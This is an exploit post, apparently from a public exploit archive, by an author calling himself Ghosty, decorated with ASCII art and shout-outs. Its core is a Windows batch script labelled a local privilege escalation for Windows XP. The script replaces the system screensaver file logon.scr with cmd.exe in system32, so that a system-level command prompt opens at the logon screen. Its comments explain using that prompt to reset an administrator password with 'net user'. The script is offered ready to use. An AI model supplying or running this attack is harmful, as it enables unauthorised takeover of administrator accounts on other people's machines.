facebook facebook twitter rss

Windows XP Local Privilege Escalation Exploit

Author: Ghosty , Published: 01-09-2014
0101010101010101010101010101010101010101010101010101010101010101010101010101
.-- .-""-. 0
. ) ( ) 1
. ( ) ( 0
. / ) 1
. (_ _) 0_,-.__ 0
. (_ )_ |_.-._/ 1
. ( ) |lulz..\ 0
. (__) |__--_/ 1
. |'' ``\ | 0
. |[Ghosty]\ | /b/ 1
. | \ ,,,---===?A`\ | ,==y' 0
. ___,,,,,---==""\ |M] \ | ;|\ |> 1
. _ _ \ ___,|H,,---==""""bno, 0
. o O (_) (_) \ / _ AWAW/ 1
. / _(+)_ dMM/ 0
. \@_,,,,,,---==" \ \\|// MW/ 1
.--''''" LMFAO === d/ 0
. SHE USED TO BE THE SWEETEST GIRL // 1
. 1337 MOTHER RUSSIA ,'_________________________ 0
. \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1
. _____ ,' ~~~ .-""-.~~~~~~ .-""-. 0
. .-""-. ///==--- /`-._ ..-' -.__..-' 1
. `-.__..-' =====\\\\\\ V/ .---\. 0
. ~~~~~~~~~~~~, _',--/_.\ .-""-. 1
. .-""-.___` -- \| -.__..- 0
0 PoC : Windows XP Local Privilege Escalation Exploit 1
1 Publisher : Ghosty (0x9h027) 0
0 Email : tfk_livebox(/at/)outlook(/dot/)fr 1
1 Fb : https://facebook.com/0x9h027 0
0 Home : Algeria 16023 ( Alger - Hydra ) 1
1 Category : Local PoC / Exploit 0
0 Tested : Windows XP SP1 , SP2 (FRENSH) 1
1 ~ .:| Sooner Or Later Palestine Will Be Free|:. ~ 0
0 1
1010101010101010101010101010101010101010101010101010101010101010101010101010
// BATCH SCRIPT START HERE

@echo off
title Windows XP Local Privilege Escalation Exploit
color 0a
cls
cd / && cd windows/system32/
mkdir ghosty && copy logon.scr ghosty\logon.scr && copy cmd.exe ghosty\cmd.exe
del logon.scr && rename cmd.exe logon.scr
echo.
echo.
echo Activate Screensaver and wait for it
echo an Unprotected dos prompt will appear
:: Gh0sty Grrr --- F-ck h4ck!n Luv 3xpl0!ting --- <3 <3 <3
:: short explaination
:: so in this script we backup the cmd.exe(COMMAND PROMPT) & logon.src(SCREENSAVER)
:: then we delete logon.scr and rename cmd.exe to logon.scr
:: we set screensaver and wait for it the system (NT/AUTORITE) will look for screen saver file (logon.scr) but its cmd.exe
:: so he will execute cmd.exe with higher privilege :) so we can use this to get the administrator account
:: ex: net user [ADMIN_HERE] [PASS_HERE]

//SCRIPT END

010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
Greeting To : All My Friends || Inject0r T34M || Exploit4Arabes || Team Mosta || An0nGh0st || Taylor Gang || YoungMoney || XDA Dev
Kha&m!x -- EvilMind -- MalikPC -- Saddam152 -- EvilDz -- Elite Trojan -- CatchCode -- FoundCode -- KedAnz-Dz -- JigSaW
WizKhalifa -- Tyga -- YG -- Drezzy -- Wezzy -- Nicki Minaj -- Chak0h - ZeGGy -- ~Effy<3
.:All MyExes Live In Texas :p:.
.: We Dem Alg3r!an l33ts:.
#EOF

Like us on Facebook :